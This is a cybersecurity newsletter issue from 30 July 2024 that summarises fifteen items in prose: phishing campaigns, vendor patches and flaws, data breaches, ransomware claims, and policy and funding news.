Cyber Briefing - 2024.07.30

?? What's the latest in the cyber world today?

微软 OneDrive, PowerShell Script, 苹果 , iOS, macOS, tvOS, visionOS, VMware , ESXi Hypervisor, Proofpoint , Email Routing, Phishing, DigiCert , SSL/TLS Certificates, Domain Verification, Zeus Group, Israeli Athletes, Olympics Paris 2024 , Northeast Rehabilitation Hospital Network , Patient Data, Avanpost , Pro-Ukrainian Hackers, RA World, Melchers , UAB School of Nursing , European Central Bank , Stress Test, US, TikTok Ban, National Security, UK, Information Commissioner's Office , Electoral Commission, Reserve Bank of India (RBI) , ZeroTier, Inc. , Funding, Virtual Networking

Welcome to Cyber Briefing , the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please subscribe .

?? Cyber Alerts

1. OneDrive Phishing Scam Deploys Malware

A sophisticated phishing campaign targeting Microsoft OneDrive users has been discovered, leveraging social engineering to execute a malicious PowerShell script. Dubbed "OneDrive Pastejacking," the attack involves sending an email with an HTML file that simulates a OneDrive error page. Users are deceived into opening a PowerShell terminal and running a Base64-encoded command, leading to the download and execution of a malicious script.

2. Apple Rolls Out Major Security Updates

Apple has issued critical security updates for a range of its operating systems, including iOS, macOS, tvOS, visionOS, watchOS, and Safari, addressing numerous vulnerabilities. The updates, released on July 30, 2024, include iOS 17.6 and iPadOS 17.6, which patch 35 security flaws that could lead to authentication bypasses, unexpected application terminations, system shutdowns, information disclosure, denial-of-service attacks, and memory leaks.

3. VMware ESXi Flaw Grants Full Admin Access

Microsoft researchers have uncovered a severe vulnerability in VMware ESXi hypervisors which grants full administrative access to unauthorized users. This flaw allows members of a specially named domain group, “ESX Admins,” to gain unrestricted admin privileges on ESXi hypervisors without proper validation. Exploited by ransomware groups such as Storm-0506 and Octo Tempest, the vulnerability enables attackers to encrypt the hypervisor’s file system, disrupting all hosted virtual machines and potentially leading to data exfiltration and lateral network movement.

4. Proofpoint Email Flaw Enables Phishing Scams

An extensive phishing campaign has exploited a significant email routing flaw in Proofpoint's security infrastructure, affecting millions of users. The campaign, dubbed "EchoSpoofing" by Guardio Labs, involved threat actors sending spoofed emails from well-known companies such as Best Buy, IBM, Nike, and Walt Disney. The flaw in Proofpoint's servers allowed these emails to bypass traditional security measures, including SPF and DKIM authentication, making them appear legitimate.

5. DigiCert to Revoke SSL/TLS Certificates

DigiCert, a prominent certificate authority, has announced the revocation of thousands of SSL/TLS certificates due to a critical Domain Control Verification error. The issue, stemming from a failure to include an underscore prefix in DNS-based CNAME records, affects approximately 0.4% of domain validations. This oversight violates the CA/Browser Forum's strict verification rules, necessitating the immediate revocation of non-compliant certificates.

?? Cyber Incidents

6. Zeus Group Leaks Data of Israeli Athletes

On July 29, 2024, the hacker group known as "Zeus" leaked sensitive data of Israeli athletes participating in the Paris Olympics, including blood test results and login credentials. The breach, revealed on Telegram, led France's Anti-Cybercrime Office (OFAC) to urgently seek the removal of the compromised information. Zeus, also reported to have disclosed the military status of Israeli athletes, has heightened security concerns amid the ongoing Gaza conflict.

7. NRHN Suffers Major Data Breach

Northeast Rehabilitation Hospital Network (NRHN) has reported a data privacy incident affecting certain current or former patients. Unauthorized access to NRHN’s network occurred between May 13 and May 22, 2024, potentially compromising files containing personal and medical information. While there is no evidence of identity theft or fraud, NRHN is actively investigating and has informed federal law enforcement. The network is enhancing its security measures and reviewing policies to prevent future incidents.

8. Pro-Ukrainian Hackers Target Russian Firm

A pro-Ukrainian hacker group known as Cyber Anarchy Squad has claimed responsibility for a significant cyberattack on Russian information security firm Avanpost. The group reported encrypting over 400 virtual machines and physical workstations, destroying more than 60 terabytes of data, and leaking 390 gigabytes of sensitive information. Avanpost, which has been operating for 15 years and provides security systems for various Russian enterprises, confirmed the breach, describing it as a serious cyberattack.

9. Melchers Hit by RA World Ransomware Attack

The Bremen-based retail group Melchers has fallen victim to a ransomware attack carried out by the group RA World. The cybercriminals have claimed to have stolen 15 gigabytes of sensitive data, including financial records and business documents, from Melchers' Singapore branch. While RA World has boasted about the breach on the darknet, Melchers has denied any data leakage. The company has confirmed the attack and is currently working with external experts to restore its systems using backups and investigate the incident further.

10. UAB Postcard Incident Exposes Patient Data

The University of Alabama at Birmingham (UAB) School of Nursing has notified 1,655 patients in Birmingham, Alabama, of a privacy breach involving a study recruitment postcard. The postcard, intended for a breast cancer diagnosis survey, inadvertently displayed patients' names, addresses, and inferred diagnoses. UAB acknowledged the error and has apologized, detailing steps taken to prevent future incidents.

?? Cyber News

11. ECB Wraps Up Banking Cyber Stress Test

The European Central Bank (ECB) has concluded its inaugural cyber stress test for the European banking sector, revealing that while banks have robust response and recovery frameworks, there is notable room for improvement. The test, conducted in January and involving 109 banks, assessed the sector's resilience against cyber disruptions. Although banks demonstrated high-level preparedness, weaknesses in recovery capabilities, particularly in worst-case scenarios, were identified. ?

12. Justice Dept. Fights TikTok Lawsuit Over Ban

The U.S. Justice Department is vigorously defending the constitutionality of a new law that could either force TikTok to divest its U.S. assets or result in a ban on the app starting January 2025. In response to TikTok's lawsuit challenging the law, which TikTok argues infringes on free speech, the Justice Department asserts that the legislation is necessary to address national security concerns. The department contends that TikTok's ownership by Chinese company ByteDance poses risks of sensitive data exposure and potential manipulation of information consumed by American users.? ?

13. ICO Blames Electoral Commission for Breach

The Information Commissioner’s Office (ICO) has sharply criticized the UK Electoral Commission for significant security shortcomings that allowed hackers to access personal details of 40 million British voters. The ICO's investigation into the August 2021 data breach revealed that the Commission failed to implement essential security measures, such as updating its Microsoft Exchange Server and enforcing robust password management policies. The breach, which went undetected until October 2022, was attributed to exploitation of known vulnerabilities and poor security practices.

14. India’s Average Data Breach Cost Hits $2.18M

According to the Reserve Bank of India’s 2024 cybersecurity report, the average cost of a data breach in India surged to $2.18 million in 2023, marking a 28% increase since 2020. The report highlights that phishing and stolen credentials are now the leading attack vectors, with phishing accounting for 22% of incidents. The number of security incidents in India skyrocketed from 53,117 in 2017 to 1.32 million in 2023. The automotive sector emerged as the most vulnerable industry, while the BFSI sector, due to stringent regulations, reported comparatively better protection.

15. ZeroTier Raises $13.5M in Series A Funding

ZeroTier, a leading provider of virtual networking solutions, has raised $13.5 million in Series A funding led by Battery Ventures, with participation from several other investors including 7percent Ventures and Airbridge Equity Partners. Founded in 2011 and based in Irvine, CA, ZeroTier offers a secure and scalable network solution optimized for IoT deployments, connecting over three million devices across 230 countries. The company plans to use the new funds to drive innovation, enhance product development, and expand its market presence.

Subscribe and Comment.

Copyright ? 2024 CyberMaterial . All Rights Reserved.

Follow CyberMaterial on:

LinkedIn , Twitter , Reddit , Instagram , Facebook , YouTube , and Medium .